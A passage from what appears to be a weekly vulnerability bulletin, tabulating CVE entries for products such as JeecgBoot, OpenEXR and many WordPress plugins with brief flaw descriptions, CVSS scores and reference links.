| actiontech--sqle | A security vulnerability has been detected in actiontech sqle up to 4.2511.0. The impacted element is an unknown function of the file sqle/utils/jwt.go of the component JWT Secret Handler. The manipulation of the argument JWTSecretKey leads to use of a hard-coded cryptographic key. The attack can be carried out remotely. The attack's complexity is rated as high. The exploitability is regarded as difficult. The exploit has been disclosed publicly and may be used. The project was informed of the problem early through an issue report and is planning to fix this flaw in an upcoming release. | 2025-12-27 | 3.7 | CVE-2025-15107 | VDB-338478; actiontech sqle JWT Secret jwt.go hard-coded key VDB-338478; CTI Indicators (IOB, IOC, TTP, IOA) Submit #710380; https://github.com/actiontech https://github.com/actiontech/sqle ≤4.2511.0 Authentication Bypass by Primary Weakness https://github.com/actiontech/sqle/issues/3186 https://github.com/actiontech/sqle/milestone/53 |
| Axesstmc--Zucchetti Axess CLOKI Access Control | Zucchetti Axess CLOKI Access Control 1.64 contains a cross-site request forgery vulnerability that allows attackers to manipulate access control settings without user interaction. Attackers can craft malicious web pages with hidden forms to disable or modify access control parameters by tricking authenticated users into loading the page. | 2025-12-23 | 3.5 | CVE-2021-47722 | ExploitDB-50595 Product Web Page Zero Science Lab Disclosure (ZSL-2021-5689) VulnCheck Advisory: Zucchetti Axess CLOKI Access Control 1.64 Cross-Site Request Forgery |
| code-projects--Student Information System | A vulnerability was detected in code-projects Student Information System 1.0. This vulnerability affects unknown code of the file /profile.php. Manipulation of the argument firstname/lastname results in cross site scripting. The attack can be carried out remotely. The exploit is now public and may be used. | 2025-12-24 | 3.5 | CVE-2025-15052 | VDB-337858; code-projects Student Information System profile.php cross site scripting VDB-337858; CTI Indicators (IOB, IOC, TTP, IOA) Submit #720765; Fabian Ros Student Information System In PHP With Source Code November 2, 2025 Cross Site Scripting https://github.com/i4G5d/CRITICAL-SECURITY-VULNERABILITY-REPORT-Stored-XSS https://code-projects.org/ |
| Dromara--Sa-Token | A weakness has been identified in Dromara Sa-Token up to 1.44.0. This affects the function ObjectInputStream.readObject of the file SaJdkSerializer.java. Manipulation can lead to deserialization. The attack may be launched remotely. This attack is characterized by high complexity. The exploitability is considered difficult. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-28 | 3.1 | CVE-2025-15117 | VDB-338495; Dromara Sa-Token SaJdkSerializer.java ObjectInputStream.readObject deserialization VDB-338495; CTI Indicators (IOB, IOC, IOA) Submit #711750; github.com/dromara/Sa-Token Sa-Token <=1.44.0 Deserialization https://github.com/Yohane-Mashiro/Sa-Token-cve |
| getmaxun--maxun | A security flaw has been discovered in getmaxun maxun up to 0.0.28. Impacted is an unknown function of the file /getmaxun/maxun/blob/develop/server/src/routes/auth.ts. Manipulation of the argument api_key results in use of a hard-coded cryptographic key. Remote exploitation of the attack is possible. The attack is considered to have high complexity. The exploitability is considered difficult. The exploit has been released to the public and may be exploited. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-27 | 3.7 | CVE-2025-15105 | VDB-338476; getmaxun auth.ts hard-coded key VDB-338476; CTI Indicators (IOB, IOC, TTP, IOA) Submit #710256; https://github.com/getmaxun https://github.com/getmaxun/maxun ≤ v0.0.28 Authentication Bypass by Primary Weakness https://gist.github.com/H2u8s/40be31987e52fc81076b6bfcfbdf3cd6 |
| Gitea--Gitea | In Gitea before 1.22.5, branch deletion permissions are not adequately enforced after merging a pull request. | 2025-12-26 | 3.1 | CVE-2025-68940 | https://blog.gitea.com/release-of-1.22.5/ https://github.com/go-gitea/gitea/releases/tag/v1.22.5 https://github.com/go-gitea/gitea/pull/32654 |
| Honor--Magic OS | ADB (Android Debug Bridge) is affected by a type privilege bypass; successful exploitation of this vulnerability may affect service availability. | 2025-12-24 | 2.2 | CVE-2025-57840 | https://www.honor.com/global/security/cve-2025-57840 |
| IBM--Aspera Faspex 5 | IBM Aspera Faspex 5 5.0.0 through 5.0.14.1 may have inconsistent permissions between the user interface and the backend API, allowing users to access features that appeared disabled, potentially leading to misuse. | 2025-12-26 | 3.8 | CVE-2025-36228 | https://www.ibm.com/support/pages/node/7255331 |
| IBM--Aspera Faspex 5 | IBM Aspera Faspex 5 5.0.0 through 5.0.14.1 could allow authenticated users to enumerate sensitive data by enumerating package identifiers. | 2025-12-26 | 3.1 | CVE-2025-36229 | https://www.ibm.com/support/pages/node/7255331 |
| CouchCMS--CouchCMS | A security flaw has been discovered in CouchCMS up to 2.4. Affected is an unknown function of the file couch/config.example.php of the component reCAPTCHA Handler. The manipulation of the argument K_RECAPTCHA_SITE_KEY/K_RECAPTCHA_SECRET_KEY results in use of a hard-coded cryptographic key. It is possible to launch the attack remotely. This attack is characterized by high complexity. The exploitability is considered difficult. The exploit has been released to the public and may be exploited. | 2025-12-22 | 3.7 | CVE-2025-15005 | VDB-337711; CouchCMS reCAPTCHA config.example.php hard-coded key VDB-337711; CTI Indicators (IOB, IOC, TTP, IOA) Submit #718998; https://github.com/CouchCMS/CouchCMS ≤ 2.4 Use of Hard-coded Cryptographic Key https://note-hxlab.wetolink.com/share/jNNcrdrNyCvl https://note-hxlab.wetolink.com/share/jNNcrdrNyCvl#-span--strong-proof-of-concept---strong---span- |
| Halo--Halo | A vulnerability was determined in Halo up to 2.21.10. This issue affects some unknown processing of the file /actuator of the component Configuration Handler. Manipulation can lead to information disclosure. The attack may be performed from remote. This attack is characterized by high complexity. The exploitability is assessed as difficult. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-28 | 3.1 | CVE-2025-15141 | VDB-338519; Halo Configuration actuator information disclosure VDB-338519; CTI Indicators (IOB, IOC, TTP, IOA) Submit #715235; Halo 2.21.10 Exposure of Sensitive Information Due to Incompatible Policies https://github.com/SECWG/cve/issues/9 |
| JeecgBoot--JeecgBoot | A vulnerability was detected in JeecgBoot up to 3.9.0. This issue affects the function queryPageList of the file /sys/sysDepartRole/list. The manipulation of the argument deptId results in improper authorization. The attack can be executed remotely. The attack has a high complexity level. The exploitability is assessed as difficult. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-28 | 3.1 | CVE-2025-15119 | VDB-338497; JeecgBoot list queryPageList improper authorization VDB-338497; CTI Indicators (IOB, IOC, TTP, IOA) Submit #711771; JeecgBoot 3.9.0 Improper Control of Resource Identifiers https://github.com/Hwwg/cve/issues/32 |
| JeecgBoot--JeecgBoot | A flaw has been found in JeecgBoot up to 3.9.0. Impacted is the function getDeptRoleList of the file /sys/sysDepartRole/getDeptRoleList. The manipulation of the argument departId causes improper authorization. The attack can be carried out remotely. A high degree of complexity is needed for the attack. The exploitability is considered difficult. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-28 | 3.1 | CVE-2025-15120 | VDB-338498; JeecgBoot getDeptRoleList improper authorization VDB-338498; CTI Indicators (IOB, IOC, TTP, IOA) Submit #711772; JeecgBoot 3.9.0 Improper Control of Resource Identifiers https://github.com/Hwwg/cve/issues/33 |
| JeecgBoot--JeecgBoot | A vulnerability was found in JeecgBoot up to 3.9.0. The impacted element is the function loadDatarule of the file /sys/sysDepartRole/datarule/. Manipulation of the argument departId/roleId results in improper authorization. It is possible to initiate the attack remotely. The attack is considered to have high complexity. The exploitability is regarded as difficult. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-28 | 3.1 | CVE-2025-15122 | VDB-338500; JeecgBoot datarule loadDatarule improper authorization VDB-338500; CTI Indicators (IOB, IOC, TTP, IOA) Submit #711774; JeecgBoot 3.9.0 Improper Control of Resource Identifiers https://github.com/Hwwg/cve/issues/35 |
| JeecgBoot--JeecgBoot | A vulnerability was determined in JeecgBoot up to 3.9.0. This affects an unknown function of the file /sys/sysDepartPermission/datarule/. Manipulation can lead to improper authorization. It is possible to launch the attack remotely. The attack requires a high level of complexity. The exploitability is reported as difficult. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-28 | 3.1 | CVE-2025-15123 | VDB-338501; JeecgBoot datarule improper authorization VDB-338501; CTI Indicators (IOB, IOC, TTP, IOA) Submit #711775; JeecgBoot 3.9.0 Improper Control of Resource Identifiers https://github.com/Hwwg/cve/issues/36 |
| JeecgBoot--JeecgBoot | A vulnerability was identified in JeecgBoot up to 3.9.0. This impacts the function getParameterMap of the file /sys/sysDepartPermission/list. The manipulation of the argument departId leads to improper authorization. The attack can be initiated remotely. The attack's complexity is rated as high. The exploitability is said to be difficult. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-28 | 3.1 | CVE-2025-15124 | VDB-338502; JeecgBoot list getParameterMap improper authorization VDB-338502; CTI Indicators (IOB, IOC, TTP, IOA) Submit #711776; JeecgBoot 3.9.0 Improper Control of Resource Identifiers https://github.com/Hwwg/cve/issues/37 |
| JeecgBoot--JeecgBoot | A security flaw has been discovered in JeecgBoot up to 3.9.0. Affected is the function queryDepartPermission of the file /sys/permission/queryDepartPermission. The manipulation of the argument departId results in improper authorization. The attack can be launched remotely. This attack is characterized by high complexity. The exploitability is considered difficult. The exploit has been released to the public and may be exploited. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-28 | 3.1 | CVE-2025-15125 | VDB-338503; JeecgBoot queryDepartPermission improper authorization VDB-338503; CTI Indicators (IOB, IOC, TTP, IOA) Submit #711777; JeecgBoot 3.9.0 Improper Control of Resource Identifiers https://github.com/Hwwg/cve/issues/38 |
| JeecgBoot--JeecgBoot | A weakness has been identified in JeecgBoot up to 3.9.0. Affected by this vulnerability is the function getPositionUserList of the file /sys/position/getPositionUserList. The manipulation of the argument positionId causes improper authorization. The attack may be initiated remotely. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been made available to the public and could be exploited. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-28 | 3.1 | CVE-2025-15126 | VDB-338504; JeecgBoot getPositionUserList improper authorization VDB-338504; CTI Indicators (IOB, IOC, TTP, IOA) Submit #711782; JeecgBoot 3.9.0 Improper Control of Resource Identifiers https://github.com/Hwwg/cve/issues/39 |
| JeecgBoot--JeecgBoot | A vulnerability has been found in JeecgBoot up to 3.9.0. The affected element is the function getDeptRoleByUserId of the file /sys/sysDepartRole/getDeptRoleByUserId. Manipulation of the argument departId leads to information disclosure. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-28 | 2.4 | CVE-2025-15121 | VDB-338499; JeecgBoot getDeptRoleByUserId information disclosure VDB-338499; CTI Indicators (IOB, IOC, TTP, IOA) Submit #711773; JeecgBoot 3.9.0 Improper Control of Resource Identifiers https://github.com/Hwwg/cve/issues/34 |
| OpenCart--OpenCart | A security flaw has been discovered in OpenCart up to 4.1.0.3. Affected by this issue is some unknown functionality of the component Single-Use Coupon Handler. Performing manipulation results in race condition. The attack may be initiated remotely. The attack's complexity is rated as high. The exploitation is known to be difficult. The exploit has been released to the public and may be exploited. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-28 | 3.7 | CVE-2025-15116 | VDB-338494 | OpenCart Single-Use Coupon race condition VDB-338494 | CTI Indicators (IOB, IOC) Submit #711745 | OpenCart 4.1.0.3 Time-of-check Time-of-use https://gist.github.com/KhanMarshaI/a55f125a55de1c0d4f41e66236027e01 https://gist.github.com/KhanMarshaI/a55f125a55de1c0d4f41e66236027e01#steps-to-reproduce |
| PbootCMS--PbootCMS | A weakness has been identified in PbootCMS up to 3.2.12. Impacted is an unknown function of the file /data/pbootcms.db of the component SQLite Database. Executing manipulation can lead to files or directories accessible. It is possible to launch the attack remotely. Attacks of this nature are highly complex. The exploitability is considered difficult. The exploit has been made available to the public and could be exploited. Modifying the configuration settings is advised. | 2025-12-28 | 3.7 | CVE-2025-15153 | VDB-338531 | PbootCMS SQLite Database pbootcms.db file access VDB-338531 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #719814 | PbootCMS 3.2.12 SQLite Database File Disclosure https://note-hxlab.wetolink.com/share/ALC1iSa8J56A |
| PandaXGO--PandaX | A vulnerability was detected in PandaXGO PandaX up to fb8ff40f7ce5dfebdf66306c6d85625061faf7e5. This affects an unknown function of the file config.yml of the component JWT Secret Handler. The manipulation of the argument key results in use of hard-coded cryptographic key . The attack may be performed from remote. This attack is characterized by high complexity. The exploitability is reported as difficult. The exploit is now public and may be used. This product utilizes a rolling release system for continuous delivery, and as such, version information for affected or updated releases is not disclosed. The project was informed of the problem early through an issue report but has not responded yet. | 2025-12-27 | 3.7 | CVE-2025-15108 | VDB-338479 | PandaXGO PandaX JWT Secret config.yml hard-coded key VDB-338479 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #711519 | https://github.com/PandaXGO https://github.com/PandaXGO/PandaX before commit fb8ff40f7ce5dfebdf66306c6d85625061faf7e5 (As of December 10, 2025) Authentication Bypass by Primary Weakness https://github.com/PandaXGO/PandaX/issues/9 |
| postmanlabs--httpbin | A security vulnerability has been detected in postmanlabs httpbin up to 0.6.1. This affects an unknown function of the file httpbin-master/httpbin/core.py. The manipulation leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed publicly and may be used. The project was informed of the problem early through an issue report but has not responded yet. | 2025-12-26 | 3.5 | CVE-2025-15095 | VDB-338424 | postmanlabs httpbin core.py cross site scripting VDB-338424 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #709002 | postmanlabs httpbin <=0.6.1 XSS https://github.com/postmanlabs/httpbin/issues/735 |
| rawchen--ecms | A vulnerability has been found in rawchen ecms up to b59d7feaa9094234e8aa6c8c6b290621ca575ded. Affected by this vulnerability is the function updateProductServlet of the file src/servlet/product/updateProductServlet.java of the component Add New Product Page. The manipulation of the argument productName leads to cross site scripting. Remote exploitation of the attack is possible. The exploit has been disclosed to the public and may be used. This product follows a rolling release approach for continuous delivery, so version details for affected or updated releases are not provided. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-28 | 2.4 | CVE-2025-15149 | VDB-338526 | rawchen ecms Add New Product updateProductServlet.java updateProductServlet cross site scripting VDB-338526 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #716583 | https://github.com/rawchen/ecms?tab=readme-ov-file ecms 1.0 Stored XSS https://github.com/zyhzheng500-maker/cve/blob/main/%E5%AD%98%E5%82%A8%E5%9E%8BXss.md |
| SohuTV--CacheCloud | A security vulnerability has been detected in SohuTV CacheCloud up to 3.2.0. This affects the function doTotalList of the file src/main/java/com/sohu/cache/web/controller/TotalManageController.java. Such manipulation leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed publicly and may be used. The project was informed of the problem early through an issue report but has not responded yet. | 2025-12-28 | 2.4 | CVE-2025-15145 | VDB-338523 | SohuTV CacheCloud TotalManageController.java doTotalList cross site scripting VDB-338523 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #716301 | SohuTV CacheCloud <=3.2.0 Reflected XSS https://github.com/sohutv/cachecloud/issues/365 https://github.com/sohutv/cachecloud/issues/365#issue-3733522215 |
| SohuTV--CacheCloud | A vulnerability was detected in SohuTV CacheCloud up to 3.2.0. This impacts the function doUserList of the file src/main/java/com/sohu/cache/web/controller/UserManageController.java. Performing manipulation results in cross site scripting. The attack may be initiated remotely. The exploit is now public and may be used. The project was informed of the problem early through an issue report but has not responded yet. | 2025-12-28 | 2.4 | CVE-2025-15146 | VDB-338524 | SohuTV CacheCloud UserManageController.java doUserList cross site scripting VDB-338524 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #716302 | SohuTV CacheCloud <=3.2.0 Reflected XSS https://github.com/sohutv/cachecloud/issues/366 https://github.com/sohutv/cachecloud/issues/366#issue-3733542570 |
| TaleLin--Lin-CMS | A vulnerability was determined in TaleLin Lin-CMS up to 0.6.0. This affects an unknown part of the file /tests/config.py of the component Tests Folder. Manipulation of the argument username/password leads to a password stored in a configuration file. The attack can be carried out remotely. The complexity of an attack is rather high. It is indicated that the exploitability is difficult. The exploit has been publicly disclosed and may be utilized. | 2025-12-28 | 3.7 | CVE-2025-15151 | VDB-338528 | TaleLin Lin-CMS Tests Folder config.py password in configuration file VDB-338528 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #721893 | https://doc.cms.talelin.com/ Lin-CMS 0.6.0 weak password https://github.com/m3ngx1ng/cve/blob/4690d4020a4a642af4c50912f762937292228641/lin-cms.md |
| TOZED--ZLT M30s | A vulnerability was determined in TOZED ZLT M30s up to 1.47. The affected element is an unknown function of the component UART Interface. Executing manipulation can lead to on-chip debug and test interface with improper access control. The physical device can be targeted for the attack. Attacks of this nature are highly complex. The exploitability is described as difficult. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-25 | 2 | CVE-2025-15083 | VDB-338411 | TOZED ZLT M30s UART on-chip debug and test interface with improper access control VDB-338411 | CTI Indicators (IOB, IOC) Submit #707974 | TOZED ZLT M30s 1.47 Improper Access Control in Debug Interface https://hacklab.eu.org/blogs/zlt_m30s_debug_interface |
| youlaitech--youlai-mall | A vulnerability was identified in youlaitech youlai-mall 1.0.0/2.0.0. The impacted element is the function orderService.payOrder of the file mall-oms/oms-boot/src/main/java/com/youlai/mall/oms/controller/app/OrderController.java of the component Order Payment Handler. The manipulation leads to improper access controls. The attack can be initiated remotely. The attack is considered to have high complexity. The exploitability is regarded as difficult. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-25 | 3.1 | CVE-2025-15084 | VDB-338412 | youlaitech youlai-mall Order Payment OrderController.java orderService.payOrder access control VDB-338412 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #708174 | youlai-mall latest Improper Control of Resource Identifiers https://github.com/Hwwg/cve/issues/24 |
| yourmaileyes--MOOC | A security flaw has been discovered in yourmaileyes MOOC up to 1.17. This affects the function subreview of the file mooc/controller/MainController.java of the component Submission Handler. Performing manipulation of the argument review results in cross site scripting. The attack can be initiated remotely. The exploit has been released to the public and may be exploited. The project was informed of the problem early through an issue report but has not responded yet. | 2025-12-28 | 3.5 | CVE-2025-15134 | VDB-338512 | yourmaileyes MOOC Submission MainController.java subreview cross site scripting VDB-338512 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #713955 | yourmaileyes MOOC V1.17 Improper Neutralization of Alternate XSS Syntax https://github.com/yourmaileyes/MOOC/issues/12 https://github.com/yourmaileyes/MOOC/issues/12#issue-3722197285 |
| Primary Vendor -- Product | Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| 10up--Eight Day Week Print Workflow | Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in 10up Eight Day Week Print Workflow eight-day-week-print-workflow allows Retrieve Embedded Sensitive Data. This issue affects Eight Day Week Print Workflow: from n/a through <= 1.2.5. | 2025-12-24 | not yet calculated | CVE-2025-67621 | https://vdp.patchstack.com/database/Wordpress/Plugin/eight-day-week-print-workflow/vulnerability/wordpress-eight-day-week-print-workflow-plugin-1-2-5-sensitive-data-exposure-vulnerability?_s_id=cve |
| 6Storage--6Storage Rentals | Server-Side Request Forgery (SSRF) vulnerability in 6Storage 6Storage Rentals 6storage-rentals allows Server Side Request Forgery. This issue affects 6Storage Rentals: from n/a through <= 2.19.9. | 2025-12-24 | not yet calculated | CVE-2025-67623 | https://vdp.patchstack.com/database/Wordpress/Plugin/6storage-rentals/vulnerability/wordpress-6storage-rentals-plugin-2-19-9-server-side-request-forgery-ssrf-vulnerability?_s_id=cve |
| abhinavxd--libredesk | Libredesk is a self-hosted customer support desk. Prior to version 0.8.6-beta, LibreDesk is vulnerable to stored HTML injection in the contact notes feature. When adding notes via POST /api/v1/contacts/{id}/notes, the backend automatically wraps user input in `<p>` tags. However, by intercepting the request and removing the `<p>` tag, an attacker can inject arbitrary HTML elements such as forms and images, which are then stored and rendered without proper sanitization. This can lead to phishing, CSRF-style forced actions, and UI redress attacks. This issue has been patched in version 0.8.6-beta. | 2025-12-27 | not yet calculated | CVE-2025-68927 | https://github.com/abhinavxd/libredesk/security/advisories/GHSA-wh6m-h6f4-rjf4 https://github.com/abhinavxd/libredesk/commit/270347849943ac6a43e9fd6ebdc99c71841900eb |
| Academy Software Foundation--OpenEXR | Academy Software Foundation OpenEXR EXR File Parsing Heap-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Academy Software Foundation OpenEXR. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of EXR files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-27946. | 2025-12-23 | not yet calculated | CVE-2025-12495 | ZDI-25-989 |
| Academy Software Foundation--OpenEXR | Academy Software Foundation OpenEXR EXR File Parsing Heap-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Academy Software Foundation OpenEXR. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of EXR files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-27947. | 2025-12-23 | not yet calculated | CVE-2025-12839 | ZDI-25-990 |
| Academy Software Foundation--OpenEXR | Academy Software Foundation OpenEXR EXR File Parsing Heap-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Academy Software Foundation OpenEXR. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of EXR files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-27948. | 2025-12-23 | not yet calculated | CVE-2025-12840 | ZDI-25-991 |
| Addonify--Addonify | Missing Authorization vulnerability in Addonify Addonify addonify-quick-view allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Addonify: from n/a through <= 2.0.4. | 2025-12-24 | not yet calculated | CVE-2025-68578 | https://vdp.patchstack.com/database/Wordpress/Plugin/addonify-quick-view/vulnerability/wordpress-addonify-plugin-2-0-4-broken-access-control-vulnerability?_s_id=cve |
| Alessandro Piconi--Simple Keyword to Link | Cross-Site Request Forgery (CSRF) vulnerability in Alessandro Piconi Simple Keyword to Link simple-keyword-to-link allows Cross Site Request Forgery. This issue affects Simple Keyword to Link: from n/a through <= 1.5. | 2025-12-24 | not yet calculated | CVE-2025-68573 | https://vdp.patchstack.com/database/Wordpress/Plugin/simple-keyword-to-link/vulnerability/wordpress-simple-keyword-to-link-plugin-1-5-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| AMP-MODE--Review Disclaimer | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in AMP-MODE Review Disclaimer review-disclaimer allows Stored XSS. This issue affects Review Disclaimer: from n/a through <= 2.0.3. | 2025-12-24 | not yet calculated | CVE-2025-67628 | https://vdp.patchstack.com/database/Wordpress/Plugin/review-disclaimer/vulnerability/wordpress-review-disclaimer-plugin-2-0-3-cross-site-scripting-xss-vulnerability?_s_id=cve |
| apiDoc--apidoc-core | Prototype pollution vulnerability in apidoc-core versions 0.2.0 and all subsequent versions allows remote attackers to modify JavaScript object prototypes via malformed data structures, including the "define" property processed by the application, potentially leading to denial of service or unintended behavior in applications relying on the integrity of prototype chains. This affects the preProcess() function in api_group.js, api_param_title.js, api_use.js, and api_permission.js worker modules. | 2025-12-26 | not yet calculated | CVE-2025-13158 | https://www.sonatype.com/security-advisories/cve-2025-13158 |
| Assaf Parag--Poll, Survey & Quiz Maker Plugin by Opinion Stage | Missing Authorization vulnerability in Assaf Parag Poll, Survey & Quiz Maker Plugin by Opinion Stage social-polls-by-opinionstage allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Poll, Survey & Quiz Maker Plugin by Opinion Stage: from n/a through <= 19.12.1. | 2025-12-24 | not yet calculated | CVE-2025-68594 | https://vdp.patchstack.com/database/Wordpress/Plugin/social-polls-by-opinionstage/vulnerability/wordpress-poll-survey-quiz-maker-plugin-by-opinion-stage-plugin-19-12-1-broken-access-control-vulnerability?_s_id=cve |
| Automattic--WooCommerce | A vulnerability in WooCommerce 8.1 to 10.4.2 can allow logged-in customers to access order data of guest customers on sites with a certain configuration. This has been fixed in WooCommerce 10.4.3, as well as all the previously affected versions through point releases, starting from 8.1, where it has been fixed in 8.1.3. It does not affect WooCommerce 8.0 or earlier. | 2025-12-22 | not yet calculated | CVE-2025-15033 | https://wpscan.com/vulnerability/f55fd7d3-7fbe-474f-9406-f47f8aee5e57/ |
| Basticom--Basticom Framework | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Basticom Basticom Framework basticom-framework allows Stored XSS. This issue affects Basticom Framework: from n/a through <= 1.5.2. | 2025-12-24 | not yet calculated | CVE-2025-67629 | https://vdp.patchstack.com/database/Wordpress/Plugin/basticom-framework/vulnerability/wordpress-basticom-framework-plugin-1-5-2-cross-site-scripting-xss-vulnerability?_s_id=cve |
| bdthemes--Prime Slider Addons For Elementor | Server-Side Request Forgery (SSRF) vulnerability in bdthemes Prime Slider - Addons For Elementor bdthemes-prime-slider-lite allows Server Side Request Forgery. This issue affects Prime Slider - Addons For Elementor: from n/a through <= 4.0.10. | 2025-12-24 | not yet calculated | CVE-2025-68500 | https://vdp.patchstack.com/database/Wordpress/Plugin/bdthemes-prime-slider-lite/vulnerability/wordpress-prime-slider-addons-for-elementor-plugin-4-0-10-server-side-request-forgery-ssrf-vulnerability?_s_id=cve |
| Ben Balter--WP Document Revisions | Missing Authorization vulnerability in Ben Balter WP Document Revisions wp-document-revisions allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects WP Document Revisions: from n/a through <= 3.7.2. | 2025-12-24 | not yet calculated | CVE-2025-68585 | https://vdp.patchstack.com/database/Wordpress/Plugin/wp-document-revisions/vulnerability/wordpress-wp-document-revisions-plugin-3-7-2-broken-access-control-vulnerability?_s_id=cve |
| BeRocket--Brands for WooCommerce | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in BeRocket Brands for WooCommerce brands-for-woocommerce allows Blind SQL Injection. This issue affects Brands for WooCommerce: from n/a through <= 3.8.6.3. | 2025-12-24 | not yet calculated | CVE-2025-68519 | https://vdp.patchstack.com/database/Wordpress/Plugin/brands-for-woocommerce/vulnerability/wordpress-brands-for-woocommerce-plugin-3-8-6-3-sql-injection-vulnerability?_s_id=cve |
| Bit Apps--Bit Assist | Missing Authorization vulnerability in Bit Apps Bit Assist bit-assist allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Bit Assist: from n/a through <= 1.5.11. | 2025-12-24 | not yet calculated | CVE-2025-68596 | https://vdp.patchstack.com/database/Wordpress/Plugin/bit-assist/vulnerability/wordpress-bit-assist-plugin-1-5-11-broken-access-control-vulnerability?_s_id=cve |
| BlueGlass Interactive AG--Jobs for WordPress | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in BlueGlass Interactive AG Jobs for WordPress job-postings allows Stored XSS. This issue affects Jobs for WordPress: from n/a through <= 2.7.17. | 2025-12-24 | not yet calculated | CVE-2025-68597 | https://vdp.patchstack.com/database/Wordpress/Plugin/job-postings/vulnerability/wordpress-jobs-for-wordpress-plugin-2-7-17-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Bob--Watu Quiz | Missing Authorization vulnerability in Bob Watu Quiz watu allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Watu Quiz: from n/a through <= 3.4.5. | 2025-12-24 | not yet calculated | CVE-2025-68587 | https://vdp.patchstack.com/database/Wordpress/Plugin/watu/vulnerability/wordpress-watu-quiz-plugin-3-4-5-broken-access-control-vulnerability-2?_s_id=cve |
| boldthemes--Bold Timeline Lite | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in bold themes Bold Timeline Lite bold-timeline-lite allows Stored XSS. This issue affects Bold Timeline Lite: from n/a through <= 1.2.7. | 2025-12-24 | not yet calculated | CVE-2025-68513 | https://vdp.patchstack.com/database/Wordpress/Plugin/bold-timeline-lite/vulnerability/wordpress-bold-timeline-lite-plugin-1-2-7-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Brainstorm Force--Astra Widgets | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Brainstorm Force Astra Widgets astra-widgets allows Stored XSS. This issue affects Astra Widgets: from n/a through <= 1.2.16. | 2025-12-24 | not yet calculated | CVE-2025-68497 | https://vdp.patchstack.com/database/Wordpress/Plugin/astra-widgets/vulnerability/wordpress-astra-widgets-plugin-1-2-16-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Brave--Brave | Missing Authorization vulnerability in Brave brave-popup-builder allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Brave: from n/a through <= 0.8.3. | 2025-12-24 | not yet calculated | CVE-2025-68508 | https://vdp.patchstack.com/database/Wordpress/Plugin/brave-popup-builder/vulnerability/wordpress-brave-plugin-0-8-3-broken-access-control-vulnerability?_s_id=cve |
| brownbagmarketing--Greenhouse Job Board | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in brownbagmarketing Greenhouse Job Board greenhouse-job-board allows DOM-Based XSS. This issue affects Greenhouse Job Board: from n/a through <= 2.7.3. | 2025-12-24 | not yet calculated | CVE-2025-67633 | https://vdp.patchstack.com/database/Wordpress/Plugin/greenhouse-job-board/vulnerability/wordpress-greenhouse-job-board-plugin-2-7-3-cross-site-scripting-xss-vulnerability?_s_id=cve |
